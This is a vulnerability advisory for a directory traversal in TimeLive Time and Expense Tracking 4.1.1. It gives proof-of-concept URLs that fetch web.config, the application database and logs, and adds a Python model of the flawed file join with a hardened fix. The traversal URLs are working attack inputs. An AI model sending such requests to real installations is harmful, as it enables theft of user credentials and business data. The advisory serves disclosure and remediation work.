Title: TimeLive Time and Expense Tracking <= 4.1.1 Multiple Vulnerabilities
Defect category: Directory Traversal/Remote Database Download/File Download/Source Code Disclosure
Author: Nathaniel Carew
Risk: High
Download: http://www.livetecs.com/Release/TimeLiveWebSetup.exe
Platform: ASP.NET
Version: 4.1.1
Tested on: Windows Server 2003 Standard SP2 / IIS 6
Thanks: Peregrinus & shiznat
Overview:
---------
When using the import/export feature for CSV, project and QuickBooks files under:
http://[target]/TimeLive/AccountAdmin/AccountImportExport.aspx
the application redirects you to a file download URL (Shared/FileDownload.aspx) whose FileName
parameter is used to open the file on disk without being confined to the download directory.
By modifying that parameter you can traverse directories and download any file hosted under the
application, including the TimeLive database in App_Data:
Proof of Concept:
-----------------
http://[target]/TimeLive/Shared/FileDownload.aspx?FileName=..\web.config
http://[target]/TimeLive/Shared/FileDownload.aspx?FileName=..\App_Data\TimeLive.mdf
http://[target]/TimeLive/Shared/FileDownload.aspx?FileName=..\Log\TimeLive.log
A single ..\ segment is enough because FileDownload.aspx lives in /TimeLive/Shared/, one level
below the application root, so the traversal lands directly in the folder holding web.config,
App_Data and Log.
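As an added example (not code from the advisory or from TimeLive itself), the following Python models the flawed join that the FileDownload.aspx behaviour implies, beside a hardened resolver that refuses the traversal. The web root, the Shared directory layout and the host name are assumptions; ntpath is used so that Windows path semantics (backslashes, drive letters, case folding) are reproduced on any host, and the PoC values above are fed through both resolvers.

```python
import ntpath
from typing import Optional
from urllib.parse import parse_qs, urlsplit

# Constructed layout (assumption, not stated in the advisory): the application
# root and the directory that FileDownload.aspx serves files from, one level
# below it. This is what makes a single "..\" reach web.config and App_Data.
WEBROOT = r"C:\inetpub\wwwroot\TimeLive"
DOWNLOAD_DIR = ntpath.join(WEBROOT, "Shared")


def filename_from_url(url: str) -> str:
    """Extract the FileName query parameter from a FileDownload.aspx request.
    parse_qs percent-decodes, so ..%5Cweb.config arrives as ..\\web.config."""
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return query.get("FileName", [""])[0]


def vulnerable_resolve(filename: str) -> str:
    """The flawed pattern the advisory implies: FileName is joined onto the
    download directory and served, with no check that the canonical result is
    still inside that directory. "..\\" segments therefore walk upward, and an
    absolute path or UNC path replaces the base entirely."""
    return ntpath.normpath(ntpath.join(DOWNLOAD_DIR, filename))


def is_escape(filename: str) -> bool:
    """True when the resolved path leaves DOWNLOAD_DIR.

    The comparison is made on canonical forms (normpath + normcase) so that
    "..\\", "../", mixed case and redundant separators all collapse first.
    commonpath raises ValueError for a different drive or a UNC share, which
    is also an escape."""
    base = ntpath.normcase(DOWNLOAD_DIR)
    resolved = ntpath.normcase(vulnerable_resolve(filename))
    try:
        return ntpath.commonpath([base, resolved]) != base
    except ValueError:
        return True


def safe_resolve(filename: str) -> Optional[str]:
    """Hardened resolver: the on-disk path to serve, or None to refuse.

    Two layers: (1) the parameter must be a bare file name (no separators,
    no drive letter, no NTFS stream ':'), and (2) the canonical result must
    still lie inside DOWNLOAD_DIR. Layer 2 alone stops the advisory's
    requests; layer 1 is defence in depth against encodings the join
    handles differently from the OS."""
    if not filename or filename in (".", ".."):
        return None
    if ntpath.basename(filename) != filename or ":" in filename:
        return None
    if is_escape(filename):
        return None
    return vulnerable_resolve(filename)


# Constructed requests mirroring the advisory's PoC URLs (host is assumed).
POC_URLS = [
    "http://timelive.example/TimeLive/Shared/FileDownload.aspx?FileName=..\\web.config",
    "http://timelive.example/TimeLive/Shared/FileDownload.aspx?FileName=..\\App_Data\\TimeLive.mdf",
    "http://timelive.example/TimeLive/Shared/FileDownload.aspx?FileName=..\\Log\\TimeLive.log",
    "http://timelive.example/TimeLive/Shared/FileDownload.aspx?FileName=export.csv",
]


def triage(urls) -> dict:
    """For each request: the path the flawed handler would open, whether that
    path escapes the download directory, and what the hardened handler does."""
    report = {}
    for url in urls:
        name = filename_from_url(url)
        report[name] = {
            "vulnerable_path": vulnerable_resolve(name),
            "escapes": is_escape(name),
            "hardened": safe_resolve(name),
        }
    return report


if __name__ == "__main__":
    for name, row in triage(POC_URLS).items():
        print(f"{name!r:32} -> {row['vulnerable_path']}  escape={row['escapes']}  hardened={row['hardened']}")
```

The containment check is the fix that matters: it is made on the canonical path after joining, not on the raw string, so it is not defeated by forward slashes, mixed case or encoded dots. NTFS also strips trailing dots and spaces from names, so a production handler should additionally allowlist the extensions it is willing to serve rather than rely on string inspection alone.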
Impact:
-------
Successful exploitation could allow an attacker to download the complete database of user
information, including email addresses, usernames and passwords and the associated timesheet
and expense data, along with any other file contained within the application's folders under
wwwroot, such as web.config (which commonly holds the database connection string) and the
application log.